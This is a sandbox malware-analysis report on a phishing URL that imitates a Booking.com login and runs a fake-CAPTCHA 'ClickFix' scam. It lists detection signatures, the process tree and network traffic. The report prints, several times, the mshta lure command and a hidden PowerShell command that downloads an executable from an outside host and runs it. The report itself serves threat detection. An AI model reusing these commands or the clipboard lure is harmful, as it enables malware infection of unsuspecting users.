Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
https://account.order129837129821.one

Overview

General Information

Sample URL:https://account.order129837129821.one
Analysis ID:1566461
Infos:

Detection

CAPTCHA Scam ClickFix
Score:84
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

AI detected phishing page
Detect drive by download via clipboard copy & paste
Yara detected CAPTCHA Scam ClickFix
AI detected suspicious Javascript
Powershell drops PE file
Sigma detected: Suspicious Invoke-WebRequest Execution
Sigma detected: Suspicious MSHTA Child Process
Suspicious powershell command line found
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTML page contains hidden javascript code
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Sigma detected: PowerShell Web Download
Sigma detected: Usage Of Web Request Commands And Cmdlets
Stores files to the Windows start menu directory
Uses taskkill to terminate processes
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

  • System is w10x64_ra
  • chrome.exe (PID: 6496 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 6892 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2040 --field-trial-handle=1920,i,12704983008749592542,2319869984269630859,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • chrome.exe (PID: 6692 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://account.order129837129821.one" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • svchost.exe (PID: 6736 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • mshta.exe (PID: 8116 cmdline: "C:\Windows\system32\mshta.exe" https://account.order129837129821.one/captcha # ? ''I am not a robot - reCAPTCHA Verification ID: 3781'' MD5: 0B4340ED812DC82CE636C00FA5C9BEF2)
    • powershell.exe (PID: 7376 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -Command "$url='https://account.order921739128391.one/downloadExe'; $tempPath=[IO.Path]::GetTempPath(); $fileName='downloaded.exe'; $destination=Join-Path $tempPath $fileName; Invoke-WebRequest -Uri $url -OutFile $destination; Start-Process $destination" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7344 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • downloaded.exe (PID: 4244 cmdline: "C:\Users\user\AppData\Local\Temp\downloaded.exe" MD5: 3AAD566F1E5EADD40727569F1C2A358D)
        • conhost.exe (PID: 1388 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • downloaded.exe (PID: 7528 cmdline: "C:\Users\user\AppData\Local\Temp\downloaded.exe" MD5: 3AAD566F1E5EADD40727569F1C2A358D)
          • conhost.exe (PID: 7500 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 2888 cmdline: C:\Windows\system32\cmd.exe /c taskkill /F /IM chrome.exe MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 6588 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • taskkill.exe (PID: 640 cmdline: taskkill /F /IM chrome.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
  • cleanup
SourceRuleDescriptionAuthorStrings
3.5.pages.csvJoeSecurity_CAPTCHAScamYara detected CAPTCHA Scam/ ClickFixJoe Security
    3.4.pages.csvJoeSecurity_CAPTCHAScamYara detected CAPTCHA Scam/ ClickFixJoe Security

      System Summary

      barindex
      Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -Command "$url='https://account.order921739128391.one/downloadExe'; $tempPath=[IO.Path]::GetTempPath(); $fileName='downloaded.exe'; $destination=Join-Path $tempPath $fileName; Invoke-WebRequest -Uri $url -OutFile $destination; Start-Process $destination", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -Command "$url='https://account.order921739128391.one/downloadExe'; $tempPath=[IO.Path]::GetTempPath(); $fileName='downloaded.exe'; $destination=Join-Path $tempPath $fileName; Invoke-WebRequest -Uri $url -OutFile $destination; Start-Process $destination", CommandLine|base64offset|contains: hv)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\system32\mshta.exe" https://account.order129837129821.one/captcha # ? ''I am not a robot - reCAPTCHA Verification ID: 3781'', ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 8116, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -Command "$url='https://account.order921739128391.one/downloadExe'; $tempPath=[IO.Path]::GetTempPath(); $fileName='downloaded.exe'; $destination=Join-Path $tempPath $fileName; Invoke-WebRequest -Uri $url -OutFile $destination; Start-Process $destination", ProcessId: 7376, ProcessName: powershell.exe
      Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -Command "$url='https://account.order921739128391.one/downloadExe'; $tempPath=[IO.Path]::GetTempPath(); $fileName='downloaded.exe'; $destination=Join-Path $tempPath $fileName; Invoke-WebRequest -Uri $url -OutFile $destination; Start-Process $destination", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -Command "$url='https://account.order921739128391.one/downloadExe'; $tempPath=[IO.Path]::GetTempPath(); $fileName='downloaded.exe'; $destination=Join-Path $tempPath $fileName; Invoke-WebRequest -Uri $url -OutFile $destination; Start-Process $destination", CommandLine|base64offset|contains: hv)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\system32\mshta.exe" https://account.order129837129821.one/captcha # ? ''I am not a robot - reCAPTCHA Verification ID: 3781'', ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 8116, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -Command "$url='https://account.order921739128391.one/downloadExe'; $tempPath=[IO.Path]::GetTempPath(); $fileName='downloaded.exe'; $destination=Join-Path $tempPath $fileName; Invoke-WebRequest -Uri $url -OutFile $destination; Start-Process $destination", ProcessId: 7376, ProcessName: powershell.exe
      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -Command "$url='https://account.order921739128391.one/downloadExe'; $tempPath=[IO.Path]::GetTempPath(); $fileName='downloaded.exe'; $destination=Join-Path $tempPath $fileName; Invoke-WebRequest -Uri $url -OutFile $destination; Start-Process $destination", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -Command "$url='https://account.order921739128391.one/downloadExe'; $tempPath=[IO.Path]::GetTempPath(); $fileName='downloaded.exe'; $destination=Join-Path $tempPath $fileName; Invoke-WebRequest -Uri $url -OutFile $destination; Start-Process $destination", CommandLine|base64offset|contains: hv)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\system32\mshta.exe" https://account.order129837129821.one/captcha # ? ''I am not a robot - reCAPTCHA Verification ID: 3781'', ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 8116, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -Command "$url='https://account.order921739128391.one/downloadExe'; $tempPath=[IO.Path]::GetTempPath(); $fileName='downloaded.exe'; $destination=Join-Path $tempPath $fileName; Invoke-WebRequest -Uri $url -OutFile $destination; Start-Process $destination", ProcessId: 7376, ProcessName: powershell.exe
      Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -Command "$url='https://account.order921739128391.one/downloadExe'; $tempPath=[IO.Path]::GetTempPath(); $fileName='downloaded.exe'; $destination=Join-Path $tempPath $fileName; Invoke-WebRequest -Uri $url -OutFile $destination; Start-Process $destination", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -Command "$url='https://account.order921739128391.one/downloadExe'; $tempPath=[IO.Path]::GetTempPath(); $fileName='downloaded.exe'; $destination=Join-Path $tempPath $fileName; Invoke-WebRequest -Uri $url -OutFile $destination; Start-Process $destination", CommandLine|base64offset|contains: hv)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\system32\mshta.exe" https://account.order129837129821.one/captcha # ? ''I am not a robot - reCAPTCHA Verification ID: 3781'', ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 8116, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -Command "$url='https://account.order921739128391.one/downloadExe'; $tempPath=[IO.Path]::GetTempPath(); $fileName='downloaded.exe'; $destination=Join-Path $tempPath $fileName; Invoke-WebRequest -Uri $url -OutFile $destination; Start-Process $destination", ProcessId: 7376, ProcessName: powershell.exe
      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -Command "$url='https://account.order921739128391.one/downloadExe'; $tempPath=[IO.Path]::GetTempPath(); $fileName='downloaded.exe'; $destination=Join-Path $tempPath $fileName; Invoke-WebRequest -Uri $url -OutFile $destination; Start-Process $destination", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -Command "$url='https://account.order921739128391.one/downloadExe'; $tempPath=[IO.Path]::GetTempPath(); $fileName='downloaded.exe'; $destination=Join-Path $tempPath $fileName; Invoke-WebRequest -Uri $url -OutFile $destination; Start-Process $destination", CommandLine|base64offset|contains: hv)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\system32\mshta.exe" https://account.order129837129821.one/captcha # ? ''I am not a robot - reCAPTCHA Verification ID: 3781'', ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 8116, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -Command "$url='https://account.order921739128391.one/downloadExe'; $tempPath=[IO.Path]::GetTempPath(); $fileName='downloaded.exe'; $destination=Join-Path $tempPath $fileName; Invoke-WebRequest -Uri $url -OutFile $destination; Start-Process $destination", ProcessId: 7376, ProcessName: powershell.exe
      Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 656, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 6736, ProcessName: svchost.exe
      No Suricata rule has matched

      Click to jump to signature section

      Show All Signature Results

      Phishing

      barindex
      Source: https://account.order129837129821.one/?op_token=EgVvYXV0aCKyAQoUNlo3Mm9IT2QzNk5uNpHcNZxKQpxRpsgVvrpvGPgRnLUDYSvaUdgYIgOtjXVTOLKpYiIiXtWnEdZzxcPuHxUiswmsJIlLgVWFNSgOkCfebTMYMuZRfpYMUHcpYqRHSIzZIsEkkOxFDlQKEjjymsUGgAoZrWELfFdljVngIVrpkGrGpSxHfNZUkiMnOZfkHNRAERWEuvDBuUuCdXLZIVifZBtUFjPRkdIxBgJFWUMFhYyntGyaywfbXFlbuAVncbySWVguhfvhXMpJoe Sandbox AI: Score: 9 Reasons: The brand 'Booking.com' is a well-known online travel agency., The legitimate domain for Booking.com is 'booking.com'., The provided URL 'account.order129837129821.one' does not match the legitimate domain., The URL contains unusual elements such as 'order129837129821' and uses a '.one' domain extension, which is not associated with Booking.com., The presence of 'account' in the subdomain could be an attempt to mimic a login or account management page, which is a common phishing tactic. DOM: 3.4.pages.csv
      Source: https://account.order129837129821.one/?op_token=EgVvYXV0aCKyAQoUNlo3Mm9IT2QzNk5uNpHcNZxKQpxRpsgVvrpvGPgRnLUDYSvaUdgYIgOtjXVTOLKpYiIiXtWnEdZzxcPuHxUiswmsJIlLgVWFNSgOkCfebTMYMuZRfpYMUHcpYqRHSIzZIsEkkOxFDlQKEjjymsUGgAoZrWELfFdljVngIVrpkGrGpSxHfNZUkiMnOZfkHNRAERWEuvDBuUuCdXLZIVifZBtUFjPRkdIxBgJFWUMFhYyntGyaywfbXFlbuAVncbySWVguhfvhXMpJoe Sandbox AI: Score: 9 Reasons: The brand 'Booking.com' is a well-known online travel agency., The legitimate domain for Booking.com is 'booking.com'., The provided URL 'account.order129837129821.one' does not match the legitimate domain., The URL contains a random string 'order129837129821' which is suspicious and not associated with Booking.com., The domain extension '.one' is unusual for Booking.com, which typically uses '.com'., The presence of input fields for 'Email address' and 'Password' on a non-legitimate domain is a common phishing tactic. DOM: 3.5.pages.csv
      Source: Yara matchFile source: 3.5.pages.csv, type: HTML
      Source: Yara matchFile source: 3.4.pages.csv, type: HTML
      Source: 0.0.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript: Script shows multiple high-risk indicators: heavily obfuscated data/URLs (long encoded strings), suspicious domain pattern (account.order129837129821.one), and uses challenge-response tokens typical of malicious redirect chains. The domain structure and extensive parameter encoding suggest potential phishing or malware distribution infrastructure.
      Source: 0.7.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript: High risk due to multiple suspicious behaviors: 1) Attempts to copy malicious command using mshta (a known attack vector) to clipboard, 2) Manipulates reCAPTCHA elements to hide them, suggesting CAPTCHA bypass attempt, 3) Command injection potential through template literal. Pattern matches typical phishing/malware deployment tactics.
      Source: 0.9.i.script.csvJoe Sandbox AI: Detected suspicious JavaScript: High risk script that attempts to manipulate reCAPTCHA elements and creates a command using 'mshta' (Microsoft HTML Application Host) which is commonly abused for malware execution. The script hides legitimate CAPTCHA elements, shows a fake loading animation, and attempts to copy a potentially malicious command to clipboard. The use of mshta and manipulation of security controls (reCAPTCHA) are strong indicators of malicious intent.
      Source: https://account.order129837129821.one/?__cf_chl_rt_tk=KDWa0..Fbck9hKg3sDTsmfFTAkMIOcfZRuzpR0xglnE-1733126008-1.0.1.1-uaZeYgkOrt8TwpiIVQbEaYAygZ1M.Dmza1AFtuMwn1IHTTP Parser: Base64 decoded: <svg xmlns="http://www.w3.org/2000/svg" width="32" height="32" fill="none"><path fill="#B20F03" d="M16 3a13 13 0 1 0 13 13A13.015 13.015 0 0 0 16 3m0 24a11 11 0 1 1 11-11 11.01 11.01 0 0 1-11 11"/><path fill="#B20F03" d="M17.038 18.615H14.87L14.563 9.5h2....
      Source: https://account.order129837129821.one/?__cf_chl_rt_tk=KDWa0..Fbck9hKg3sDTsmfFTAkMIOcfZRuzpR0xglnE-1733126008-1.0.1.1-uaZeYgkOrt8TwpiIVQbEaYAygZ1M.Dmza1AFtuMwn1IHTTP Parser: No favicon
      Source: https://account.order129837129821.one/HTTP Parser: No favicon
      Source: https://account.order129837129821.one/HTTP Parser: No favicon
      Source: https://account.order129837129821.one/?op_token=EgVvYXV0aCKyAQoUNlo3Mm9IT2QzNk5uNpHcNZxKQpxRpsgVvrpvGPgRnLUDYSvaUdgYIgOtjXVTOLKpYiIiXtWnEdZzxcPuHxUiswmsJIlLgVWFNSgOkCfebTMYMuZRfpYMUHcpYqRHSIzZIsEkkOxFDlQKEjjymsUGgAoZrWELfFdljVngIVrpkGrGpSxHfNZUkiMnOZfkHNRAERWEuvDBuUuCdXLZIVifZBtUFjPRkdIxBgJFWUMFhYyntGyaywfbXFlbuAVncbySWVguhfvhXMpHTTP Parser: No favicon
      Source: https://account.order129837129821.one/?op_token=EgVvYXV0aCKyAQoUNlo3Mm9IT2QzNk5uNpHcNZxKQpxRpsgVvrpvGPgRnLUDYSvaUdgYIgOtjXVTOLKpYiIiXtWnEdZzxcPuHxUiswmsJIlLgVWFNSgOkCfebTMYMuZRfpYMUHcpYqRHSIzZIsEkkOxFDlQKEjjymsUGgAoZrWELfFdljVngIVrpkGrGpSxHfNZUkiMnOZfkHNRAERWEuvDBuUuCdXLZIVifZBtUFjPRkdIxBgJFWUMFhYyntGyaywfbXFlbuAVncbySWVguhfvhXMpHTTP Parser: No favicon
      Source: unknownHTTPS traffic detected: 23.218.208.109:443 -> 192.168.2.16:49724 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 4.175.87.197:443 -> 192.168.2.16:49728 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 23.218.208.109:443 -> 192.168.2.16:49730 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 4.175.87.197:443 -> 192.168.2.16:49768 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.67.139.99:443 -> 192.168.2.16:49769 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.46.36:443 -> 192.168.2.16:49770 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 104.21.46.36:443 -> 192.168.2.16:49774 version: TLS 1.2
      Source: unknownTCP traffic detected without corresponding DNS query: 40.126.53.12
      Source: unknownTCP traffic detected without corresponding DNS query: 40.126.53.12
      Source: unknownTCP traffic detected without corresponding DNS query: 40.126.53.12
      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
      Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
      Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
      Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
      Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
      Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
      Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
      Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
      Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
      Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
      Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
      Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
      Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
      Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
      Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
      Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
      Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
      Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
      Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
      Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
      Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
      Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
      Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
      Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
      Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
      Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
      Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
      Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
      Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
      Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
      Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
      Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
      Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
      Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
      Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
      Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
      Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
      Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
      Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
      Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
      Source: global trafficDNS traffic detected: DNS query: account.order129837129821.one
      Source: global trafficDNS traffic detected: DNS query: a.nel.cloudflare.com
      Source: global trafficDNS traffic detected: DNS query: www.google.com
      Source: global trafficDNS traffic detected: DNS query: challenges.cloudflare.com
      Source: global trafficDNS traffic detected: DNS query: q-xx.bstatic.com
      Source: global trafficDNS traffic detected: DNS query: account.order921739128391.one
      Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
      Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
      Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
      Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49697
      Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
      Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
      Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
      Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
      Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49697 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
      Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
      Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
      Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
      Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
      Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
      Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49701
      Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49701 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
      Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
      Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
      Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
      Source: unknownNetwork traffic detected: HTTP traffic on port 49678 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
      Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
